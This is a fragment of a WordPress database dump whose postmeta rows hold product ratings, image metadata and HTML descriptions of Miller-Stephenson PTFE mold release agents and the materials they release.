INSERT INTO `wp_postmeta` VALUES (15250, 579, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15251, 579, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15252, 1097, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15253, 1097, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15254, 1042, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15255, 1042, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15256, 1042, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15257, 64, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (15259, 302, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15260, 302, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15261, 868, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15262, 868, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15263, 419, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15264, 419, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15265, 1164, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15266, 1164, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15267, 1067, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15268, 1067, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15269, 182, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15270, 182, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nMS-122AV uses proprietary surface activation chemistry to make it Miller-Stephenson\'s most robust PTFE release agent.  MS-122AV is particularly effective when used on clean molds.  Our specialized chemistry can be used to release the following materials:\r\n<table style="height: 112px;" width="673">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubber and Silcone</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15271, 182, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15272, 302, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15273, 302, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nMS-122SE can be used in compression and transfer molding, it is particularly effective on contaminated molds.  MS-122SE can release the following materials:\r\n<table style="height: 110px;" width="375">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15274, 302, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15275, 306, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15276, 306, '716_default_editor', '<strong>Release Agent Applications</strong>\r\n\r\nMS-143XD can be used to release the following materials with virtually no transfer of the release agent:\r\n<table style="height: 102px;" width="324">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15277, 306, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15278, 305, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15279, 305, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15280, 1519, '_wp_attached_file', '2016/08/MS-122SE-Aerospace.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15281, 1519, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3500;s:6:"height";i:2334;s:4:"file";s:30:"2016/08/MS-122SE-Aerospace.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"MS-122SE-Aerospace-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"MS-122SE-Aerospace-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"MS-122SE-Aerospace-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"MS-122SE-Aerospace-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"MS-122SE-Aerospace-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"MS-122SE-Aerospace-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"MS-122SE-Aerospace-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"MS-122SE-Aerospace-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15282, 302, '_thumbnail_id', '1519'); 
INSERT INTO `wp_postmeta` VALUES (15283, 1520, '_wp_attached_file', '2016/08/MS-143AX-.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15284, 1520, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2500;s:6:"height";i:1667;s:4:"file";s:21:"2016/08/MS-143AX-.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"MS-143AX--340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"MS-143AX--800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"MS-143AX--768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"MS-143AX--1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"MS-143AX--250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"MS-143AX--200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"MS-143AX--225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"MS-143AX--510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15285, 305, '_thumbnail_id', '1520'); 
INSERT INTO `wp_postmeta` VALUES (15286, 305, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15287, 305, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15288, 305, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15289, 303, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15290, 303, '716_default_editor', '<strong>Release Agent Applications</strong>\r\n\r\nMS-143TE formulation chemistry can be used to release the following materials and comes in concentrations ranging from 1-10 % PTFE.  It is very effective with Rubber to Metal bonding operations.\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15291, 303, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15292, 1521, '_wp_attached_file', '2016/08/MS-143TE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15293, 1521, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:7999;s:6:"height";i:4408;s:4:"file";s:20:"2016/08/MS-143TE.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-143TE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-143TE-800x441.jpg";s:5:"width";i:800;s:6:"height";i:441;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-143TE-768x423.jpg";s:5:"width";i:768;s:6:"height";i:423;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-143TE-1600x882.jpg";s:5:"width";i:1600;s:6:"height";i:882;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-143TE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-143TE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-143TE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-143TE-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15294, 303, '_thumbnail_id', '1521'); 
INSERT INTO `wp_postmeta` VALUES (15295, 347, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15296, 1522, '_wp_attached_file', '2016/08/MS-143XD.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15297, 1522, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4600;s:6:"height";i:3066;s:4:"file";s:20:"2016/08/MS-143XD.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-143XD-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-143XD-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-143XD-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"MS-143XD-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-143XD-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-143XD-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-143XD-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-143XD-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15298, 306, '_thumbnail_id', '1522'); 
INSERT INTO `wp_postmeta` VALUES (15299, 769, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15300, 783, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15301, 784, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15302, 788, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15303, 789, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15304, 790, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15305, 814, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15306, 402, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15307, 402, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15308, 402, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15309, 818, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15310, 818, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15311, 818, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15312, 819, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15313, 819, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15314, 819, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15319, 821, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15320, 821, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15321, 821, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15322, 821, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15323, 822, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15324, 822, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15325, 822, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15326, 1185, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15327, 1185, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15328, 1185, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15329, 1185, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15330, 822, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15331, 823, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15332, 823, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15333, 823, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15334, 824, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15340, 410, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15341, 410, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15342, 410, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15343, 410, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15344, 843, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15345, 843, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15346, 843, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15347, 846, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15348, 846, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15349, 846, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15350, 846, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15351, 844, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15352, 844, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15353, 844, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15354, 844, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15355, 847, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15356, 847, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15357, 847, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15358, 847, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15359, 848, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15360, 848, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15361, 848, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15362, 848, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15363, 850, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15364, 850, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15365, 850, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15366, 852, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15367, 852, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15368, 852, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15369, 852, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15370, 421, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15371, 421, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15372, 421, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15373, 436, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15374, 436, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15375, 436, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15376, 437, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15377, 437, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15378, 437, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15384, 1128, '_aioseop_title', 'Dental HandpieceLubricant'); 
INSERT INTO `wp_postmeta` VALUES (15385, 1525, '_edit_lock', '1500492872:1'); 
INSERT INTO `wp_postmeta` VALUES (15386, 1525, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (15387, 438, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15388, 438, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15389, 438, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15390, 439, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15391, 439, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15392, 439, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15393, 440, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15394, 440, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15395, 440, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15396, 441, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15397, 442, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15398, 442, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15399, 442, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15400, 642, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15401, 642, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15402, 642, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15403, 645, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15404, 645, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15405, 645, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15406, 643, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15407, 643, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15408, 643, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15409, 644, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15410, 644, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15411, 644, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15412, 638, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15413, 638, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15414, 638, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15418, 647, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15419, 647, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15420, 651, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15421, 651, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15422, 653, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15423, 653, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15424, 653, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15425, 655, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15426, 655, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15427, 655, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15428, 655, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15429, 651, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15432, 290, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15433, 290, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15434, 715, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15435, 715, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15436, 649, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15437, 649, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (15441, 1554, '_wp_attached_file', '2016/09/mold-release-agent-miller-stephenson.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15442, 1554, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:4016;s:4:"file";s:48:"2016/09/mold-release-agent-miller-stephenson.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:48:"mold-release-agent-miller-stephenson-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:48:"mold-release-agent-miller-stephenson-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:48:"mold-release-agent-miller-stephenson-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:50:"mold-release-agent-miller-stephenson-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:48:"mold-release-agent-miller-stephenson-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:48:"mold-release-agent-miller-stephenson-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:48:"mold-release-agent-miller-stephenson-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:48:"mold-release-agent-miller-stephenson-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15447, 1525, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (15456, 1559, '_wp_attached_file', '2016/09/PTFE-mold-release.jpg'); 
